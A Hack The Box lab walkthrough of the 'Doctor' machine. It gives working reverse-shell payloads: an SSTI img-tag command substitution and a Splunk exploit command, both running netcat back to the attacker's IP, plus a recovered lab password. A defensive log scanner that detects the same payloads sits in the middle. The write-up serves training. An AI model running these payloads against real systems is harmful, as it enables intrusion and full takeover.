Doctor: Hack The Box Walkthrough
Doctor is one of the easy boxes on HTB. FYI, HTB's easy boxes are still tougher than the boxes on any other platform.

Add the IP address (10.10.10.209) together with the hostname doctors.htb to the hosts file (/etc/hosts) and we are good to go!!!
Concepts Learnt:
- Enumeration
- SSTI, i.e. Server-Side Template Injection
- Reverse shell
- Privilege Escalation using Splunk
Port Scanning
Scanning with nmap to find the open ports and the services running on them.
Command used: nmap -A -T4 doctors.htb

We can observe that the Splunk, HTTP and SSH ports are open. Starting with web recon.
We can see that there is a login page in the application; we could also use dirbuster/dirb or gobuster to enumerate all the pages in the web app.

So we have the login portal now; tried SQLi but no luck.

So we have no option left but to sign up in the portal.

Now while enumerating I observed that whatever message is put in the Title field gets reflected in /archive (in the page source), a URI found in the directory scan.

Since the value is reflected we could try various attacks like XSS, SSTI, etc.
No luck with XSS, so trying SSTI.
There are various methods to find out whether the field is vulnerable to SSTI or not. Personally I follow this image to identify the specific template engine used in the application as well as whether it is vulnerable or not.

Enter in the title field {7*7} → {{7*7}} → {{7*'7'}} → Result 55555. This shows that the template engine used in the application is Jinja2 or Twig.
For detailed info on SSTI (Server Side Template Injection) visit:
Gaining reverse shell:
Now that we have enough information about the template engine, we could use it to create a reverse shell payload. There are a plethora of reverse shell payloads available on the internet. The easiest payload which I encountered is
<img src=http://10.10.14.33/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.33'$IFS'1234')>
Here we are calling netcat, and $IFS in the code stands for whitespace (the shell's internal field separator), which avoids literal spaces in the payload. Thus our simplified code (for understanding purposes) is:
<img src=http://IPaddressofmachine/$(nc -e /bin/bash '10.10.14.33' '1234')>

Or we could use the payload mentioned here!!
Make sure a listener is already active before executing this command; here in our case nc -nlvp 1234, since we used port 1234 in the malicious code.
Boom we got the reverse shell!!!
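From the defender's side, the probe sequence above ({7*7}, {{7*7}}, then a command substitution inside an img tag) is easy to spot in web-server logs. The following is an added example, not part of the original walkthrough or the box: a small scanner that parses constructed Apache combined-format log lines, URL-decodes each request target and flags template-expression and shell-substitution indicators. It assumes the injected field is visible to the log (a query string here; a POST body would need application-level logging).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines modelling the SSTI probe sequence; not taken from the real box.
SAMPLE_LOG = """\
10.10.14.33 - - [10/Oct/2020:12:00:01 +0000] "GET /archive HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.33 - - [10/Oct/2020:12:00:05 +0000] "GET /post/new?title=%7B7*7%7D HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.10.14.33 - - [10/Oct/2020:12:00:09 +0000] "GET /post/new?title=%7B%7B7*7%7D%7D HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.10.14.33 - - [10/Oct/2020:12:00:15 +0000] "GET /post/new?title=%3Cimg+src%3Dhttp%3A%2F%2F10.10.14.33%2F%24%28nc.traditional%24IFS-e%24IFS%2Fbin%2Fbash%29%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.10.10.1 - - [10/Oct/2020:12:01:00 +0000] "GET /post/new?title=Hello+Doctor HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules run against the URL-decoded request target.
RULES = [
    # Jinja2/Twig {{ }}, {% %}; also ${ } and <% %> used by other engines.
    ("template-expression", re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>")),
    # The classic arithmetic probe, with one or more braces and optional quoted operand.
    ("template-probe-arith", re.compile(r"\{+\s*\d+\s*\*\s*['\"]?\d+['\"]?\s*\}+")),
    # Shell command substitution and the $IFS whitespace trick seen in the payload above.
    ("shell-substitution", re.compile(r"\$\(|`|\$IFS")),
]


def scan_access_log(text):
    """Return one finding per suspicious log line: line number, client IP, decoded target, rules hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        decoded = unquote_plus(m["target"])  # %7B%7B7*7%7D%7D becomes {{7*7}}
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            findings.append({"line": lineno, "ip": m["ip"], "path": decoded, "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {f['rules']} -> {f['path']}")
```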

We got the www (web) account on the machine. Getting an interactive shell using the python pty module:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now by exploring the system we find that the user account present is shaun. Enumerating the groups of the accounts to find more info.

We find that the web account is in the adm group, which is used for viewing log files, i.e. /var/log.
Now looking for the apache2 logs on the system and hoping to find something useful!

Boom… we found a backup file. Digging into the backup file we find the password, i.e. Guitar123 (by grepping for the keyword "password" in the file).

Privilege Escalation
Logging in using the user account and password, i.e. su shaun with the password Guitar123.
Here we reach our first checkpoint, i.e. the user flag in the home folder.
Yet this account also does not have sudo rights (sudo -l). So we look for binary vulnerabilities using linpeas. No luck.
Now, googling about the exploitation of Splunk HTTPD (privilege escalation), we found an exploit:
Exploiting Splunk using the parameters required, as mentioned in the exploit's readme file:
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.33 --username shaun --password Guitar123 --payload "nc.traditional -e/bin/sh '10.10.14.33' '1233'"
Here --host 10.10.10.209 is Doctor's IP address and --lhost 10.10.14.33 is our IP address. Thus, using netcat, we try to get a reverse shell.

Make sure the netcat listener is active on the port we mentioned in the Splunk exploit's payload parameter, here in our case "1233".

Boom we got the root access!!!
Since we have root access, we can get an interactive shell using the python pty module as before and complete our final checkpoint, i.e. the root flag.
For more walkthroughs stay tuned!!! Any doubts lemme know in the comment section. See you soon!!